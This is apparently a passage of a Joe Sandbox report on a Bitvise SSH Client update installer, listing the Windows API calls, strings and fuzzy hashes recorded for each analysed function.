                                                                                                                                  • Instruction Fuzzy Hash: 6D319C70A00249EBDF18DFA4DD05BAEBBF5FF44714F104169E815B7281CBB56A08CB90
                                                                                                                                  APIs
                                                                                                                                  • RegSetValueExW.ADVAPI32(00000000,00000000,00000000,?,00000004,00000004,00000004,00000000), ref: 00E6F401
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6F459
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionException@8RaiseThrowValue
                                                                                                                                  • String ID: NumCast$RegSetValueExW()$value >= 0
                                                                                                                                  • API String ID: 546801787-3683907876
                                                                                                                                  • Opcode ID: f74819cb782ae7480e7225e33c0f4e4db9606474e6015200b866e9fff43bc901
                                                                                                                                  • Instruction ID: 37c2ff41ebd168b3f70fcaaf7d2913c902d3def3d606c56c00903763f23a2677
                                                                                                                                  • Opcode Fuzzy Hash: f74819cb782ae7480e7225e33c0f4e4db9606474e6015200b866e9fff43bc901
                                                                                                                                  • Instruction Fuzzy Hash: 85318970A00209AFDB14DF64D855BEEBBF5FF48754F104169E825B7281DB7AAA08CB90
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E5A450: LocalFree.KERNEL32 ref: 00E5A45A
                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000008), ref: 00E5A4F3
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E5A536
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5A55F
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00E5A57F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$AllocErrorException@8FreeLastLengthThrow
                                                                                                                                  • String ID: LocalAlloc()
                                                                                                                                  • API String ID: 4043245386-2360299210
                                                                                                                                  • Opcode ID: 97732b8962d2259e58f25e26371a17662f18aa3bc4ed6b95e4ff3eb5e71b869d
                                                                                                                                  • Instruction ID: 2a087e113eb04324d929ca009855bd7ea3289f607acaac593ad0522798c23e8b
                                                                                                                                  • Opcode Fuzzy Hash: 97732b8962d2259e58f25e26371a17662f18aa3bc4ed6b95e4ff3eb5e71b869d
                                                                                                                                  • Instruction Fuzzy Hash: 33F0A4755003056BCB387AB99C0AF5A3EADAB40715F040934FD15A72C5EEB0E848C7A6
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48,460C02D8), ref: 0102C716
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0102C727
                                                                                                                                  • new.LIBCMT ref: 0102C744
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 0102C79D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                                                  • String ID: n
                                                                                                                                  • API String ID: 2351996187-3297054318
                                                                                                                                  • Opcode ID: 60a2372b5d7f11be853c062e217cbbaecc533c67fc5690a9b6bdd15cc8abc22d
                                                                                                                                  • Instruction ID: fc363d93c404c0120e4c31e5afad70030cc05d18b4cfa9ff4fecf7f4a4de2f4a
                                                                                                                                  • Opcode Fuzzy Hash: 60a2372b5d7f11be853c062e217cbbaecc533c67fc5690a9b6bdd15cc8abc22d
                                                                                                                                  • Instruction Fuzzy Hash: E2112670C09288DFDB15CB68D50979DBBF8EF06308F0002DAD454A7386C3B51A04CBA2
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,01124CB9,?,?,01124C59,?,012FF4D8,0000000C,01124DB0,?,00000002), ref: 01124D28
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01124D3B
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,01124CB9,?,?,01124C59,?,012FF4D8,0000000C,01124DB0,?,00000002,00000000), ref: 01124D5E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                  • Opcode ID: 4d9e9c2852f67314d495ee577a11322d703f6018f57cd2d4715814aefe8978d9
                                                                                                                                  • Instruction ID: eaabc66574aff6e4a41198eae98d193df7ee643c4f283502ed67321c70d7d2de
                                                                                                                                  • Opcode Fuzzy Hash: 4d9e9c2852f67314d495ee577a11322d703f6018f57cd2d4715814aefe8978d9
                                                                                                                                  • Instruction Fuzzy Hash: 82F0C83060021CBBDB299F65D849BAEBFB8EF04715F0001B8F915A2254DF346994CB80
                                                                                                                                  APIs
                                                                                                                                  • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 0111BBD5
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0111BBE5
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 0111BC10
                                                                                                                                  Strings
                                                                                                                                  • Attempted a typeid of nullptr pointer!, xrefs: 0111BBCC
                                                                                                                                  • Bad read pointer - no RTTI data!, xrefs: 0111BC07
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::__non_rtti_object::__construct_from_string_literal$ExceptionException@8RaiseThrow
                                                                                                                                  • String ID: Attempted a typeid of nullptr pointer!$Bad read pointer - no RTTI data!
                                                                                                                                  • API String ID: 3530510960-4195314292
                                                                                                                                  • Opcode ID: 78a6c00a87536637a04bb505b8dbe0b883cd1a0e72120822ebfe23baab6dcb92
                                                                                                                                  • Instruction ID: d65b60894ad989fb61f8d3a42a0e6d121259aa1e7d3423d10772e5283b1e10d2
                                                                                                                                  • Opcode Fuzzy Hash: 78a6c00a87536637a04bb505b8dbe0b883cd1a0e72120822ebfe23baab6dcb92
                                                                                                                                  • Instruction Fuzzy Hash: 87F0BB766083096ED70CDBA5D685F8DF3F4AF14619F10406DE110D7154DBB0FE008658
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E4AB1D
                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000), ref: 00E4AB24
                                                                                                                                  • wsprintfA.USER32 ref: 00E4AB3C
                                                                                                                                  Strings
                                                                                                                                  • Ensure check failed in module '%s', version %s, PID %u, TID %u, function '%s', line %u:%s, xrefs: 00E4AB36
                                                                                                                                  • 9.39, xrefs: 00E4AB2E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$ProcessThreadwsprintf
                                                                                                                                  • String ID: Ensure check failed in module '%s', version %s, PID %u, TID %u, function '%s', line %u:%s$9.39
                                                                                                                                  • API String ID: 2521638806-727602990
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 00E60ED8
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E60F17
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B99C), ref: 00E619D9
                                                                                                                                    • Part of subcall function 00E5F1D0: EnterCriticalSection.KERNEL32(0131B8F8,460C02D8), ref: 00E5F208
                                                                                                                                    • Part of subcall function 00E5F1D0: EnterCriticalSection.KERNEL32(0131B8F8), ref: 00E5F23A
                                                                                                                                    • Part of subcall function 00E5F1D0: LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F275
                                                                                                                                    • Part of subcall function 00E5F1D0: LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F287
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$Leave$Enter
                                                                                                                                  • String ID: %$:
                                                                                                                                  • API String ID: 2978645861-4129514765
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 00E63F86
                                                                                                                                  • GetNumberOfConsoleInputEvents.KERNEL32(?), ref: 00E63FB4
                                                                                                                                  • GetConsoleCP.KERNEL32 ref: 00E64065
                                                                                                                                  • GetACP.KERNEL32 ref: 00E64071
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B99C), ref: 00E64085
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleCriticalSection$EnterEventsInputLeaveNumber
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4237849186-0
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 0112CB64
                                                                                                                                    • Part of subcall function 01126F59: HeapFree.KERNEL32(00000000,00000000,?,0112CE0A,?,00000000,?,00000000,?,0112D0AE,?,00000007,?,?,0112D8DE,?), ref: 01126F6F
                                                                                                                                    • Part of subcall function 01126F59: GetLastError.KERNEL32(?,?,0112CE0A,?,00000000,?,00000000,?,0112D0AE,?,00000007,?,?,0112D8DE,?,?), ref: 01126F81
                                                                                                                                  • _free.LIBCMT ref: 0112CB76
                                                                                                                                  • _free.LIBCMT ref: 0112CB88
                                                                                                                                  • _free.LIBCMT ref: 0112CB9A
                                                                                                                                  • _free.LIBCMT ref: 0112CBAC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  APIs
                                                                                                                                  • InterlockedCompareExchange.KERNEL32(0131ADFC,00000001,00000000), ref: 00E4A8D9
                                                                                                                                  • SwitchToThread.KERNEL32(?,00E4F9FE,460C02D8,?,?,?,01164AB5,000000FF), ref: 00E4A8E3
                                                                                                                                  • InitializeCriticalSection.KERNEL32(0131AE00), ref: 00E4A8F0
                                                                                                                                  • InterlockedExchange.KERNEL32(0131ADFC,00000002), ref: 00E4A8FD
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131AE00), ref: 00E4A911
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CompareEnterInitializeSwitchThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1619914552-0
                                                                                                                                  • Opcode ID: ffa375d4967baf9ce8dac3d3b2a6825134b6097153364745febdf5b17c3af8bb
                                                                                                                                  • Instruction ID: f5af3f480ce7d397c390be4271d542a43f6fe1333f26318b7d8b3ae5a156bde3
                                                                                                                                  • Opcode Fuzzy Hash: ffa375d4967baf9ce8dac3d3b2a6825134b6097153364745febdf5b17c3af8bb
                                                                                                                                  • Instruction Fuzzy Hash: 4DE09B31389340ABD63C1751796EB653735EB00727F480478F252E2148C77054DADB52
                                                                                                                                  APIs
                                                                                                                                  • SetLastError.KERNEL32(0000000E,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,01217A7C,?,00000000,, function ',0000000C), ref: 00E4A7B7
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E4A803
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_taskErrorLast
                                                                                                                                  • String ID: !af_ && i<length()$basic_ncstring<wchar_t>::operator []
                                                                                                                                  • API String ID: 523316592-589021327
                                                                                                                                  • Opcode ID: fa6f14a4e0d73a22028b00a02551e18a23dec886ffcbd833629fd926b970e84b
                                                                                                                                  • Instruction ID: feabe837d3b52e500a3e6cb61b05da84d7b23a37c42a8b9af625d068dfa99a10
                                                                                                                                  • Opcode Fuzzy Hash: fa6f14a4e0d73a22028b00a02551e18a23dec886ffcbd833629fd926b970e84b
                                                                                                                                  • Instruction Fuzzy Hash: 63C13430E802199FDF24CF68E4856BDB7B1EF55324F0CA5BAE821FB241D6349942C756
                                                                                                                                  APIs
                                                                                                                                  • MoveFileW.KERNEL32(00000000,?), ref: 00E6C350
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,000000FF), ref: 00E6C3AB
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,000000FF), ref: 00E6C400
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$FileMove
                                                                                                                                  • String ID: MoveFileW()
                                                                                                                                  • API String ID: 2925174528-1661149990
                                                                                                                                  • Opcode ID: 1f9bee7a40651011b9416b1c87ed4a0fdf0a08273336c18cb23612941abb0816
                                                                                                                                  • Instruction ID: f597ca73397356432bc68ee7561b19539ea61b44f31631e60beb5561c7583794
                                                                                                                                  • Opcode Fuzzy Hash: 1f9bee7a40651011b9416b1c87ed4a0fdf0a08273336c18cb23612941abb0816
                                                                                                                                  • Instruction Fuzzy Hash: 0FD1BB70A042589FDF28CFA4D8A4BFEB7B4AF10388F5450E8E459AB681DB749F44CB51
                                                                                                                                  APIs
                                                                                                                                  • SetLastError.KERNEL32(0000000E,00000001,0131B724,?,?,0131B724,00000000,?,0131B724,00000000), ref: 00E4A360
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E4A3BA
                                                                                                                                  Strings
                                                                                                                                  • !af_ && i<length(), xrefs: 00E4A3AE
                                                                                                                                  • basic_ncstring<char>::operator [], xrefs: 00E4A3A9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_taskErrorLast
                                                                                                                                  • String ID: !af_ && i<length()$basic_ncstring<char>::operator []
                                                                                                                                  • API String ID: 523316592-2453873884
                                                                                                                                  • Opcode ID: 8ebd591ccf5fa57fb48dc4119bb3b26aff3efaf489a5a7ee17170f4b60cfcfe2
                                                                                                                                  • Instruction ID: 032a152ab7eaf0fed50ede278f95280ca29dbe1c15268b6b9d3cc4c147dc3fd9
                                                                                                                                  • Opcode Fuzzy Hash: 8ebd591ccf5fa57fb48dc4119bb3b26aff3efaf489a5a7ee17170f4b60cfcfe2
                                                                                                                                  • Instruction Fuzzy Hash: C7A10430A912128FDF28CE15E580B7DB3A1EF90729F18697CC497A7ED1E774A981C702
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E6CE60: RegCloseKey.ADVAPI32(012A03EC,460C02D8,?), ref: 00E6CEA1
                                                                                                                                  • new.LIBCMT ref: 00E7F9D9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close
                                                                                                                                  • String ID: !af_$BvUpdateManager::Load$datavect<unsigned char>::empty
                                                                                                                                  • API String ID: 3535843008-4123486968
                                                                                                                                  • Opcode ID: 2101e7e6b38c3f23541b610ce7034f31b04585afdc85166b169917394e123119
                                                                                                                                  • Instruction ID: 952251a6c9bffe8983b3c647a64347bb0d2f4a6b5471194eb60cab6503e5ace2
                                                                                                                                  • Opcode Fuzzy Hash: 2101e7e6b38c3f23541b610ce7034f31b04585afdc85166b169917394e123119
                                                                                                                                  • Instruction Fuzzy Hash: B9A19C70904248EFDB15CF94C954BEEBBF4EF54318F2481AEE4497B281D7B66A04CB91
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6DEDC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                  • String ID: !af_$RegQueryValueExW()$datavect<unsigned char>::size
                                                                                                                                  • API String ID: 2005118841-2130799390
                                                                                                                                  • Opcode ID: d44ec31546a4d938fd42e18ed7c42fd0809b280b1106c5e70d79233537f8ff51
                                                                                                                                  • Instruction ID: b6ba6b5e42118356f5ed5eb24b8f9313eee154cb1e2c6def8067bd05be6b8080
                                                                                                                                  • Opcode Fuzzy Hash: d44ec31546a4d938fd42e18ed7c42fd0809b280b1106c5e70d79233537f8ff51
                                                                                                                                  • Instruction Fuzzy Hash: D481D030F44209DFCB24DF98E894BEEBBB5AF54358F549168E4127B281DB729D04CB90
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E56C13
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                  • String ID: parameter value; expecting 'y' or 'n'.$Invalid -$yes
                                                                                                                                  • API String ID: 2005118841-2405171723
                                                                                                                                  • Opcode ID: a28ff3c3015c9046f93ab49737ded535ad1e4bfd7448240f6c571cdfef9ca4e1
                                                                                                                                  • Instruction ID: 18ece9ffcba91d41edeb6ae268735deac69f2d08c4d3fa002a7f6369315b16b6
                                                                                                                                  • Opcode Fuzzy Hash: a28ff3c3015c9046f93ab49737ded535ad1e4bfd7448240f6c571cdfef9ca4e1
                                                                                                                                  • Instruction Fuzzy Hash: 37819B719002089FDF10DFA4D945BEEBBF8EF15319F548459E814B7382D776AA09CBA0
                                                                                                                                  APIs
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E5EA4A
                                                                                                                                    • Part of subcall function 00E3A2C0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E3A2D7
                                                                                                                                    • Part of subcall function 00E3A2C0: ___std_exception_copy.LIBVCRUNTIME ref: 00E3A321
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_taskException@8Throw___std_exception_copy
                                                                                                                                  • String ID: ERROR: $Trace: $Warning:
                                                                                                                                  • API String ID: 2281437974-3985709694
                                                                                                                                  • Opcode ID: ebf08de661d2fe53878989570ed25c8431d0de9c5428a1693e2967f4604f47f3
                                                                                                                                  • Instruction ID: dd7bd023e235afb91e7b0920e0f1266904622cb1fe0e4323106c2bf4e167ba6f
                                                                                                                                  • Opcode Fuzzy Hash: ebf08de661d2fe53878989570ed25c8431d0de9c5428a1693e2967f4604f47f3
                                                                                                                                  • Instruction Fuzzy Hash: 57614271E002099BCF18DF64D945AEEB7B8EF04755F105959F822B7391DB30AA09CBA1
                                                                                                                                  APIs
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E429D7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                  • String ID: basic_ncstring<char>::insert$extend <= str.size() + 1 - off$off <= str.size()
                                                                                                                                  • API String ID: 118556049-1041268945
                                                                                                                                  • Opcode ID: 5444208e39d6cd77584e18f6d529c2b7f7bef71952df6548eae494b482b2f8e9
                                                                                                                                  • Instruction ID: 5261841965c489d069beb72c6cf002ca1b739237a7dec75c00990abffa94e033
                                                                                                                                  • Opcode Fuzzy Hash: 5444208e39d6cd77584e18f6d529c2b7f7bef71952df6548eae494b482b2f8e9
                                                                                                                                  • Instruction Fuzzy Hash: A551D571B0020A9FCB18DF58ECC0A6EB7A9EF94318B54452DFA15E7245E732ED15C790
                                                                                                                                  APIs
                                                                                                                                  • new.LIBCMT ref: 00E3C232
                                                                                                                                    • Part of subcall function 010FFBD0: GetCurrentProcess.KERNEL32(00000001,460C02D8,?,00000000,00000000,011A3DC3,000000FF,?,011129E7,00000001), ref: 010FFC14
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E3C33A
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentExceptionException@8ProcessRaiseThrow
                                                                                                                                  • String ID: %$Check for updates failed:
                                                                                                                                  • API String ID: 3100977213-1640003455
                                                                                                                                  • Opcode ID: defe22dced068673fa2751474b1f6e8e0f12dba8020e79b5c5a5bd25d218b10d
                                                                                                                                  • Instruction ID: 10ff5cdd771be44dcc786f7e95c1bff9490b48e19b8d36979b8637ce7d186a00
                                                                                                                                  • Opcode Fuzzy Hash: defe22dced068673fa2751474b1f6e8e0f12dba8020e79b5c5a5bd25d218b10d
                                                                                                                                  • Instruction Fuzzy Hash: 19716A70C05288DEEB15EBA4D959BDDBFF0AF25308F2480E8D04977292DB745B48DB62
                                                                                                                                  APIs
                                                                                                                                  • new.LIBCMT ref: 00E75923
                                                                                                                                  • new.LIBCMT ref: 00E75936
                                                                                                                                    • Part of subcall function 01119334: Concurrency::cancel_current_task.LIBCPMT ref: 0111934C
                                                                                                                                    • Part of subcall function 00E44630: IsDebuggerPresent.KERNEL32(460C02D8,0131B928,?,?), ref: 00E4465E
                                                                                                                                    • Part of subcall function 00E44630: DebugBreak.KERNEL32 ref: 00E44668
                                                                                                                                    • Part of subcall function 00E44630: GetModuleFileNameA.KERNEL32(00000000,?,0000012B), ref: 00E446D2
                                                                                                                                    • Part of subcall function 00E44630: Concurrency::cancel_current_task.LIBCPMT ref: 00E44742
                                                                                                                                  Strings
                                                                                                                                  • result.IsType<UpdateCheckResult>(), xrefs: 00E75AA5
                                                                                                                                  • BvUpdateManager::RunCheckForUpdatesThread, xrefs: 00E75AA0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_task$BreakDebugDebuggerFileModuleNamePresent
                                                                                                                                  • String ID: BvUpdateManager::RunCheckForUpdatesThread$result.IsType<UpdateCheckResult>()
                                                                                                                                  • API String ID: 2958679970-353432569
                                                                                                                                  • Opcode ID: e980f333a6c631918ca7a3b338461e2dd193b1a5c65f1b620bd209f79aa28828
                                                                                                                                  • Instruction ID: 68c5ca2e2c2f6aca7281e5872ebf35455d662cf88311519d13de831d1fc941ab
                                                                                                                                  • Opcode Fuzzy Hash: e980f333a6c631918ca7a3b338461e2dd193b1a5c65f1b620bd209f79aa28828
                                                                                                                                  • Instruction Fuzzy Hash: 23518CB1904349EFEB10CF95C945B9EBBF8EF04718F10856DE458BB281D7BA6A04CB91
                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyExW.ADVAPI32(80000002,0131A974,00000000,011E3870,00000000,?,00000000,?,00000000), ref: 0107001D
                                                                                                                                  • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000004,?,00000004,?,00000000), ref: 010700B6
                                                                                                                                  • RegSetValueExW.ADVAPI32(?,RuntimeVersion,00000000,00000001,0131A974,00000000), ref: 01070117
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$Create
                                                                                                                                  • String ID: RuntimeVersion
                                                                                                                                  • API String ID: 3530024225-3397776816
                                                                                                                                  • Opcode ID: 9af961bb564a2d4071520837eae51340fcaa82fcb751237a7d4ea5538a594abd
                                                                                                                                  • Instruction ID: 678766a493fb5ae97e8dc003f634c0cb0e2aac8ee1d002a5bbeedb82ce34e091
                                                                                                                                  • Opcode Fuzzy Hash: 9af961bb564a2d4071520837eae51340fcaa82fcb751237a7d4ea5538a594abd
                                                                                                                                  • Instruction Fuzzy Hash: 93519DB0E04248EFDB28DFA8DD19BAEBBF4BB05704F104169F555AB2D0D770A904CB50
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E463C0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E4647E
                                                                                                                                  • SetConsoleTitleW.KERNEL32(Bitvise SSH Client Update,00000001,?,460C02D8), ref: 00E3C10A
                                                                                                                                  • GetCommandLineW.KERNEL32 ref: 00E3C113
                                                                                                                                  Strings
